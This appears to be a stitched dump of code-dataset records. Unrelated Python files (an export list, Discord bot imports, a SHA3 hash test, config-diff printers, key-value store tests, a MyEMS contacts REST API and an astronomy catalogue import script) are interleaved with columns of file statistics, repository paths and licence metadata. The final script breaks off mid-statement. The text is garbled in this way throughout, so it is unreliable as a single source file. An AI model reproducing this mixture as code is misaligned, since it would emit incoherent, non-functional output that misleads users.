TChildGetN6,
TClassWithFn,
TConcrete,
TDependentParamInt,
TDependentUsingInt,
TOuter,
TcrtpConcrete,
TcrtpFwdConcrete,
VBase,
VChild,
VirtualComma,
checkConvertRpyintToInt,
check_impure_io,
check_pure_io,
convertRpyintToInt,
fnEmptyDefaultParam,
fnIgnoredParam,
fnOverload,
fnParamArrayOut,
fnParamArrayOutWithDefault,
fnParamFundConstRef,
fnParamFundPtr,
fnParamFundRef,
fnRenamed,
fnRenamedParam,
fnSimpleDefaultParam,
get123,
raise_from,
raise_from_already_set,
subpkg,
)
__all__ = [
"Abstract",
"ClassWithFields",
"ClassWithIgnored",
"ClassWithTrampoline",
"DocAppendClass",
"DocAppendEnum",
"DocClass",
"DocEnum",
"DocTemplateAppend",
"DocTemplateSet",
"EnumContainer",
"EnumWithIgnored",
"GCEnum",
"GEnum",
"IBase",
"IChild",
"IFinal",
"IGrandChild",
"IMChild",
"IMOther",
"LTTester",
"LTWithVirtual",
"MVB",
"MVC",
"MVD0",
"MVD1",
"MVE",
"MVF",
"NSEnumContainer",
"NSGCEnum",
"NSGEnum",
"NestedTypecaster",
"Nurse",
"OB",
"OBInitializer",
"OBinitOB",
"OC",
"OCInitializer",
"OCinitOB",
"OCinitOC",
"OG",
"OGinitOC",
"OverloadedObject",
"PBase",
"PChild",
"PGChild",
"PatientRef",
"RenamedClass",
"RenamedEnum",
"StaticOnly",
"StripPrefixEnum",
"TBase",
"TBaseGetN4",
"TBaseGetN6",
"TBasicString",
"TChildGetN4",
"TChildGetN6",
"TClassWithFn",
"TConcrete",
"TDependentParamInt",
"TDependentUsingInt",
"TOuter",
"TcrtpConcrete",
"TcrtpFwdConcrete",
"VBase",
"VChild",
"VirtualComma",
"checkConvertRpyintToInt",
"check_impure_io",
"check_pure_io",
"convertRpyintToInt",
"fnEmptyDefaultParam",
"fnIgnoredParam",
"fnOverload",
"fnParamArrayOut",
"fnParamArrayOutWithDefault",
"fnParamFundConstRef",
"fnParamFundPtr",
"fnParamFundRef",
"fnRenamed",
"fnRenamedParam",
"fnSimpleDefaultParam",
"get123",
"raise_from",
"raise_from_already_set",
"subpkg",
]
| 17.712707
| 83
| 0.612913
| 210
| 3,206
| 9.228571
| 0.480952
| 0.02322
| 0.016512
| 0.018576
| 0.942208
| 0.942208
| 0.942208
| 0.942208
| 0.942208
| 0.942208
| 0
| 0.007745
| 0.275109
| 3,206
| 180
| 84
| 17.811111
| 0.826162
| 0.025265
| 0
| 0
| 1
| 0
| 0.294909
| 0.022735
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011299
| 0
| 0.011299
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60c8d5d5fdd9e3d1516ddfc5a278883e436b21ee
| 420
|
py
|
Python
|
Platforms/Web/Processing/Api/Discord/Configs/Blacklistedwords/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 2
|
2017-09-14T08:07:55.000Z
|
2021-05-18T05:05:05.000Z
|
Platforms/Web/Processing/Api/Discord/Configs/Blacklistedwords/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 111
|
2018-04-15T14:32:14.000Z
|
2021-03-28T21:06:29.000Z
|
Platforms/Web/Processing/Api/Discord/Configs/Blacklistedwords/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 1
|
2018-04-15T13:24:44.000Z
|
2018-04-15T13:24:44.000Z
|
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.create as create
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.delete as delete
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.errors as errors
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.get as get
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.main as main
| 70
| 85
| 0.869048
| 55
| 420
| 6.636364
| 0.254545
| 0.205479
| 0.246575
| 0.383562
| 0.835616
| 0.835616
| 0.835616
| 0.835616
| 0
| 0
| 0
| 0
| 0.047619
| 420
| 5
| 86
| 84
| 0.9125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
60da9e5bfc14533e861ce7f9018860f57d0a094b
| 2,645
|
py
|
Python
|
Draft_Phuong/hash/test_hash.py
|
phuong27102000/NTRU_HRSS_KEM_SV
|
fe4fd095134a41f4131a3aa953197e3933b303ad
|
[
"MIT"
] | null | null | null |
Draft_Phuong/hash/test_hash.py
|
phuong27102000/NTRU_HRSS_KEM_SV
|
fe4fd095134a41f4131a3aa953197e3933b303ad
|
[
"MIT"
] | null | null | null |
Draft_Phuong/hash/test_hash.py
|
phuong27102000/NTRU_HRSS_KEM_SV
|
fe4fd095134a41f4131a3aa953197e3933b303ad
|
[
"MIT"
] | null | null | null |
import hashes
import pack
import check
import bit_handle
seed = []
message = "1101001010110001110100000010111001010010101001101000110101000110100110111101001111001000011010101001000110000011110000101000000010011000100101001000011000111011001010101010000011011110110100101100111110001100101100101001111101001111101100101111111010011011001000111100000100001001000010001110001010110001010101101101011011011010110101010101110000101111001011011010001000010010110111101000111100001010000000010101010101111011001101000101011101010110010011010011111011101110000101010010100111011100000010000011001101101001010110000010100010000100101001111001000000101000011100010100001100110101101010101100110100000011101100010100100000100100010111110100100000101110010001111000111010010011101110110001111101001001011010110000101111100010001010100111011000010111000010010011111001101101101101110111100010100000101011001000111010110010110011101010101010110110100111101111101000110000101000101111010101011101011111110111100000000011010100001010110101011010100000101001000110100100110001110100010010001001010110100001110101000010111100001110110010101001110101010110101001100101001001111000011011011100000000100101001110111101010010001011001010100101011100111000000000100101011001100000010000001100010011000111110011010001100101100111110110010101011101111011101100101010110011110010011111001001010000001110101001110010010111111010001111010100001101111100101011111100000011010000011000000000000011001101100101010010111101110010001110001001010010101111001111100101011001001100011111001001110000111000111100001100111011000111001101110100101000110000110111010011100111110001100111000011101011010101100001101000100101000100000111000010010100101010010111011100100111100010111001000000111000000010111011010110000111011100000100101010001000100110001001011000110111000000101101111110110101110011010010111011000110101100101110001100111110010001100010110010110011101110010101000011010111110001000010101110111011010101011011110110010010100000110011000010100110100011001100001001101101100110010011011110111110111010100100111111011000001100100010000010101101110000101101111001001100110110011001110000010111011100011110101010101110011010100010001100100100111100000010011101000000100110011010001110011100101000010001001010110111010100100000100101001010011011111"
message = message[::-1]
map = {'1': 1, '0': 0}
for char in message:
seed += [map.get(char)]
print(check.show(pack.bi2by(seed)))
s = seed.copy()
s.reverse()
s2 = int.from_bytes(bit_handle.arr_to_str(s)[::-1],"big")
print("Day la: %X" %s2)
ciph = hashes.sha3_256(seed)
print(check.show(pack.bi2by(ciph)))
| 139.210526
| 2,252
| 0.944045
| 67
| 2,645
| 37.179104
| 0.537313
| 0.007226
| 0.01124
| 0.014452
| 0.018466
| 0
| 0
| 0
| 0
| 0
| 0
| 0.874612
| 0.026087
| 2,645
| 18
| 2,253
| 146.944444
| 0.092391
| 0
| 0
| 0
| 0
| 0
| 0.858013
| 0.852303
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.235294
| 0
| 0.235294
| 0.176471
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
60dddc606815e2617018487cf1a7cba8a52a37f9
| 2,222
|
py
|
Python
|
cloudlift/config/diff.py
|
sannithibalaji/cloudlift
|
656e152adff353fcb45c800d464a4ed945b7b34f
|
[
"MIT"
] | 19
|
2019-03-04T08:38:18.000Z
|
2022-03-25T04:48:38.000Z
|
cloudlift/config/diff.py
|
sannithibalaji/cloudlift
|
656e152adff353fcb45c800d464a4ed945b7b34f
|
[
"MIT"
] | 28
|
2020-01-19T07:16:02.000Z
|
2022-02-24T06:58:27.000Z
|
cloudlift/config/diff.py
|
sannithibalaji/cloudlift
|
656e152adff353fcb45c800d464a4ed945b7b34f
|
[
"MIT"
] | 10
|
2019-07-29T12:21:03.000Z
|
2021-11-17T15:52:54.000Z
|
from terminaltables import SingleTable
from cloudlift.config.logging import log_bold
def print_parameter_changes(differences):
changes_to_show = [["Type", "Config", "Old val", "New val"]]
for difference in differences:
if difference[0] == 'change':
changes_to_show.append([
'change',
difference[1],
difference[2][0],
difference[2][1]]
)
if difference[0] == 'add':
difference[2].sort(key=lambda x: x[0])
for added_item in difference[2]:
changes_to_show.append([
'add',
added_item[0],
'',
added_item[1]])
if difference[0] == 'remove':
difference[2].sort(key=lambda x: x[0])
for removed_item in difference[2]:
changes_to_show.append(['remove', removed_item[0],
removed_item[1], ''])
log_bold("Modifications to config:")
print(SingleTable(changes_to_show).table)
def print_json_changes(differences):
changes_to_show = [["Type", "Config", "Old val", "New val"]]
for difference in differences:
if difference[0] == 'change':
changes_to_show.append([
'change',
difference[1],
difference[2][0],
difference[2][1]
])
if difference[0] == 'add':
difference[2].sort(key=lambda x: x[0])
for added_item in difference[2]:
changes_to_show.append([
'add',
difference[1],
'',
str(added_item[0])+" : "+str(added_item[1])
])
if difference[0] == 'remove':
difference[2].sort(key=lambda x: x[0])
for removed_item in difference[2]:
changes_to_show.append([
'remove',
str(difference[1])+"."+str(removed_item[0]),
removed_item[1],
''
])
log_bold("Modifications to config:")
print(SingleTable(changes_to_show).table)
| 35.269841
| 66
| 0.486049
| 227
| 2,222
| 4.585903
| 0.185022
| 0.126801
| 0.12488
| 0.10951
| 0.849183
| 0.849183
| 0.849183
| 0.849183
| 0.849183
| 0.849183
| 0
| 0.027982
| 0.388839
| 2,222
| 62
| 67
| 35.83871
| 0.738586
| 0
| 0
| 0.719298
| 0
| 0
| 0.072007
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035088
| false
| 0
| 0.035088
| 0
| 0.070175
| 0.070175
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8803935f8970a7c24771e264a79f3ffa6a64ffe4
| 2,716
|
py
|
Python
|
tests/test_query.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
tests/test_query.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
tests/test_query.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
from dynafile import Dynafile
def test_query_forward(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"name": "Dynafile",
}
ab = {
"PK": "1",
"SK": "ab",
"name": "Dynafile",
}
ac = {
"PK": "1",
"SK": "ac",
"name": "Dynafile",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
items = list(db.query(pk="1", starts_with="ab"))
assert items == [ab, ac]
def test_query_backwords(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"name": "Dynafile",
}
ab = {
"PK": "1",
"SK": "ab",
"name": "Dynafile",
}
ac = {
"PK": "1",
"SK": "ac",
"name": "Dynafile",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
items = list(db.query(pk="1", starts_with="ab", scan_index_forward=False))
assert items == [ab, aa]
def test_query_with_callable_filter(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"name": "Dynafile",
}
ab = {
"PK": "1",
"SK": "ab",
"name": "Dynafile",
}
ac = {
"PK": "1",
"SK": "ac",
"name": "Dynafile",
}
ba = {
"PK": "1",
"SK": "ba",
"name": "Dynafile",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
db.put_item(item=ba)
items = list(db.query(pk="1", _filter=lambda i: i["SK"].startswith("a")))
assert items == [aa, ab, ac]
def test_query_with_string_filter(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"name": "Dynafile",
}
ab = {
"PK": "1",
"SK": "ab",
"name": "Dynafile",
}
ac = {
"PK": "1",
"SK": "ac",
"name": "Dynafile",
}
ba = {
"PK": "1",
"SK": "ba",
"name": "Dynafile",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
db.put_item(item=ba)
items = list(db.query(pk="1", _filter="SK =~ /^a/"))
assert items == [aa, ab, ac]
def test_query_with_string_filter_nested(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"data": {
"count": 0
},
}
ab = {
"PK": "1",
"SK": "ab",
"data": {
"count": 1
},
}
db.put_item(item=aa)
db.put_item(item=ab)
items = list(db.query(pk="1", _filter="data.count > 0"))
assert items == [ab]
| 18.106667
| 78
| 0.434094
| 335
| 2,716
| 3.370149
| 0.119403
| 0.055802
| 0.070859
| 0.184234
| 0.826395
| 0.804252
| 0.804252
| 0.782108
| 0.782108
| 0.782108
| 0
| 0.013809
| 0.360088
| 2,716
| 150
| 79
| 18.106667
| 0.635788
| 0
| 0
| 0.719008
| 0
| 0
| 0.12661
| 0
| 0
| 0
| 0
| 0
| 0.041322
| 1
| 0.041322
| false
| 0
| 0.008264
| 0
| 0.049587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7166f0c505205324a42a55080e1c8d4ba01546c8
| 12,302
|
py
|
Python
|
myems-api/core/contact.py
|
RichardZhong/myems-carbon
|
fec34f938a7c8e0166544704eb8467a41d6b034f
|
[
"MIT"
] | null | null | null |
myems-api/core/contact.py
|
RichardZhong/myems-carbon
|
fec34f938a7c8e0166544704eb8467a41d6b034f
|
[
"MIT"
] | null | null | null |
myems-api/core/contact.py
|
RichardZhong/myems-carbon
|
fec34f938a7c8e0166544704eb8467a41d6b034f
|
[
"MIT"
] | 1
|
2022-01-29T14:22:17.000Z
|
2022-01-29T14:22:17.000Z
|
import falcon
import simplejson as json
import mysql.connector
import config
import uuid
import re
class ContactCollection:
@staticmethod
def __init__():
pass
@staticmethod
def on_options(req, resp):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp):
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
query = (" SELECT id, name, uuid, "
" email, phone, description "
" FROM tbl_contacts "
" ORDER BY name ")
cursor.execute(query)
rows = cursor.fetchall()
cursor.close()
cnx.disconnect()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
meta_result = {"id": row[0],
"name": row[1],
"uuid": row[2],
"email": row[3],
"phone": row[4],
"description": row[5]}
result.append(meta_result)
resp.body = json.dumps(result)
@staticmethod
def on_post(req, resp):
"""Handles POST requests"""
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=ex)
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_USER_NAME')
name = str.strip(new_values['data']['name'])
if 'email' not in new_values['data'].keys() or \
not isinstance(new_values['data']['email'], str) or \
len(str.strip(new_values['data']['email'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EMAIL')
email = str.lower(str.strip(new_values['data']['email']))
match = re.match(r'^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$', email)
if match is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EMAIL')
if 'phone' not in new_values['data'].keys() or \
not isinstance(new_values['data']['phone'], str) or \
len(str.strip(new_values['data']['phone'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_USER_PHONE')
phone = str.strip(new_values['data']['phone'])
if 'description' in new_values['data'].keys() and \
new_values['data']['description'] is not None and \
len(str(new_values['data']['description'])) > 0:
description = str.strip(new_values['data']['description'])
else:
description = None
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_contacts "
" WHERE name = %s ", (name,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.CONTACT_NAME_IS_ALREADY_IN_USE')
add_row = (" INSERT INTO tbl_contacts "
" (name, uuid, email, phone, description) "
" VALUES (%s, %s, %s, %s, %s) ")
cursor.execute(add_row, (name,
str(uuid.uuid4()),
email,
phone,
description))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/contacts/' + str(new_id)
class ContactItem:
@staticmethod
def __init__():
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONTACT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
query = (" SELECT id, name, uuid, email, phone, description "
" FROM tbl_contacts "
" WHERE id = %s ")
cursor.execute(query, (id_,))
row = cursor.fetchone()
cursor.close()
cnx.disconnect()
if row is None:
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.CONTACT_NOT_FOUND')
result = {"id": row[0],
"name": row[1],
"uuid": row[2],
"email": row[3],
"phone": row[4],
"description": row[5]}
resp.body = json.dumps(result)
@staticmethod
def on_delete(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONTACT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_contacts "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.CONTACT_NOT_FOUND')
# check relation with shopfloors
cursor.execute(" SELECT id "
" FROM tbl_shopfloors "
" WHERE contact_id = %s ", (id_,))
rows_shopfloors = cursor.fetchall()
if rows_shopfloors is not None and len(rows_shopfloors) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_SHOPFLOORS')
# check relation with spaces
cursor.execute(" SELECT id "
" FROM tbl_spaces "
" WHERE contact_id = %s ", (id_,))
rows_spaces = cursor.fetchall()
if rows_spaces is not None and len(rows_spaces) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_SPACES')
# check relation with stores
cursor.execute(" SELECT id "
" FROM tbl_stores "
" WHERE contact_id = %s ", (id_,))
rows_stores = cursor.fetchall()
if rows_stores is not None and len(rows_stores) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_STORES')
# check relation with tenants
cursor.execute(" SELECT id "
" FROM tbl_tenants "
" WHERE contact_id = %s ", (id_,))
rows_tenants = cursor.fetchall()
if rows_tenants is not None and len(rows_tenants) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_TENANTS')
cursor.execute(" DELETE FROM tbl_contacts WHERE id = %s ", (id_,))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
@staticmethod
def on_put(req, resp, id_):
"""Handles PUT requests"""
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=ex)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_')
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_CONTACT_NAME')
name = str.strip(new_values['data']['name'])
if 'email' not in new_values['data'].keys() or \
not isinstance(new_values['data']['email'], str) or \
len(str.strip(new_values['data']['email'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EMAIL')
email = str.lower(str.strip(new_values['data']['email']))
match = re.match(r'^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,4})$', email)
if match is None:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EMAIL')
if 'phone' not in new_values['data'].keys() or \
not isinstance(new_values['data']['phone'], str) or \
len(str.strip(new_values['data']['phone'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_USER_PHONE')
phone = str.strip(new_values['data']['phone'])
if 'description' in new_values['data'].keys() and \
new_values['data']['description'] is not None and \
len(str(new_values['data']['description'])) > 0:
description = str.strip(new_values['data']['description'])
else:
description = None
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_contacts "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.CONTACT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_contacts "
" WHERE name = %s AND id != %s ", (name, id_))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.CONTACT_NAME_IS_ALREADY_IN_USE')
update_row = (" UPDATE tbl_contacts "
" SET name = %s, email = %s, "
" phone = %s, description = %s "
" WHERE id = %s ")
cursor.execute(update_row, (name,
email,
phone,
description,
id_,))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_200
| 39.178344
| 105
| 0.506747
| 1,302
| 12,302
| 4.619048
| 0.106759
| 0.050881
| 0.069172
| 0.095111
| 0.846026
| 0.828234
| 0.778517
| 0.773695
| 0.760392
| 0.760392
| 0
| 0.017034
| 0.370102
| 12,302
| 313
| 106
| 39.303514
| 0.759066
| 0.012681
| 0
| 0.733333
| 0
| 0.007843
| 0.179458
| 0.044432
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035294
| false
| 0.007843
| 0.023529
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7167b7e85f2a5ffc0c767902d4be8be1c97f67ef
| 46,657
|
py
|
Python
|
tasks/ascii.py
|
DouglasBoubert/hypervelocity
|
17d2c91902fe0c1ea7b35cde65f41a44c85d6201
|
[
"MIT"
] | 2
|
2021-02-14T23:01:19.000Z
|
2021-02-15T08:39:55.000Z
|
tasks/ascii.py
|
DouglasBoubert/hypervelocity
|
17d2c91902fe0c1ea7b35cde65f41a44c85d6201
|
[
"MIT"
] | null | null | null |
tasks/ascii.py
|
DouglasBoubert/hypervelocity
|
17d2c91902fe0c1ea7b35cde65f41a44c85d6201
|
[
"MIT"
] | 1
|
2018-02-25T16:27:20.000Z
|
2018-02-25T16:27:20.000Z
|
# -*- coding: utf-8 -*-
"""ASCII datafiles.
Often produced from LaTeX tables in the original papers,
but sometimes provided as supplementary datafiles on the journal webpages.
"""
import csv
import os
import re
from datetime import datetime
from decimal import Decimal
from glob import glob
from astrocats.catalog.photometry import PHOTOMETRY, set_pd_mag_from_counts
from astrocats.catalog.utils import (is_number, jd_to_mjd, make_date_string,
pbar, pbar_strings)
from astropy import units as u
from astropy.coordinates import SkyCoord as coord
from astropy.io.ascii import read
from astropy.time import Time as astrotime
from ..faststars import FASTSTARS
from ..utils import rgc_to_dhel
def do_ascii(catalog):
"""Process ASCII files extracted from datatables of published works."""
task_str = catalog.get_current_task_str()
# catalog.journal_entries()
# return
#def holding():
# 2007ApJ...660..311B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'ApJ_660_311_table1.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = 'SDSS'+str(row['SDSS'])
name, source = catalog.new_entry(oname, bibcode='2007ApJ...660..311B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Margaret J. Geller, Scott J. Kenyon, Michael J. Kurtz, Benjamin C. Bromley', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2007), source)
gallon = float(str(row['Glon']))
gallat = float(str(row['Glat']))
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhelio']), source=source)
galrad_MS = float(str(row['Ra']))
galrad_BHB = float(str(row['Rb']))
dhel_MS = rgc_to_dhel(galrad_MS,gallon,gallat)
dhel_BHB = rgc_to_dhel(galrad_BHB,gallon,gallat)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel_MS), u_value='kpc', source=source,derived=True)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel_BHB), u_value='kpc', source=source,derived=True)
catalog.entries[name].add_quantity(
FASTSTARS.SPECTRAL_TYPE, str(row['Sp']), source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "d", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "bhb", source=source)
catalog.entries[name].add_quantity(
FASTSTARS.STELLAR_CLASS, "g", source=source)
catalog.journal_entries()
# 2009ApJ...690.1639B
datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',
'apj292642t1_ascii.csv')
data = read(datafile, format='csv')
for row in pbar(data, task_str):
oname = row['Catalog']
name, source = catalog.new_entry(oname, bibcode='2009ApJ...690.1639B')
if (FASTSTARS.DISCOVERER not in catalog.entries[name]):
catalog.entries[name].add_quantity(FASTSTARS.DISCOVERER,'Warren R. Brown, Margaret J. Geller, Scott J. Kenyon', source)
catalog.entries[name].add_quantity(FASTSTARS.DISCOVER_DATE,str(2009), source)
gallon = float(str(row['Glon']))
gallat = float(str(row['Glat']))
if (oname!='US708') & (oname!='HE0437-5439'):
radec = oname.strip('SDSSJ')
radec = radec[0:2]+' '+radec[2:4]+' '+radec[4:9]+' '+radec[9:12]+' '+radec[12:14]+' '+radec[14:18]
ra, dec = coord(radec,
unit=(u.hourangle, u.deg)).to_string(
'hmsdms', sep=':').split()
catalog.entries[name].add_quantity(
FASTSTARS.RA, ra, source=source)
catalog.entries[name].add_quantity(
FASTSTARS.DEC, dec, source=source)
if str(row['e_Vhel'])!='NA':
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), e_value=str(row['e_Vhel']), source=source)
else:
catalog.entries[name].add_quantity(
FASTSTARS.VELOCITY, str(row['Vhel']), source=source)
galrad = float(str(row['RGC']))
dhel = rgc_to_dhel(galrad,gallon,gallat)
catalog.entries[name].add_quantity(
FASTSTARS.LUM_DIST, str(dhel), u_value='kpc', source=source,derived=True)
sptype = str(row['Type']).split('/')
for SPTYPE in sptype:
if SPTYPE == "sdO":
catalog.entries[name].add_quantity(
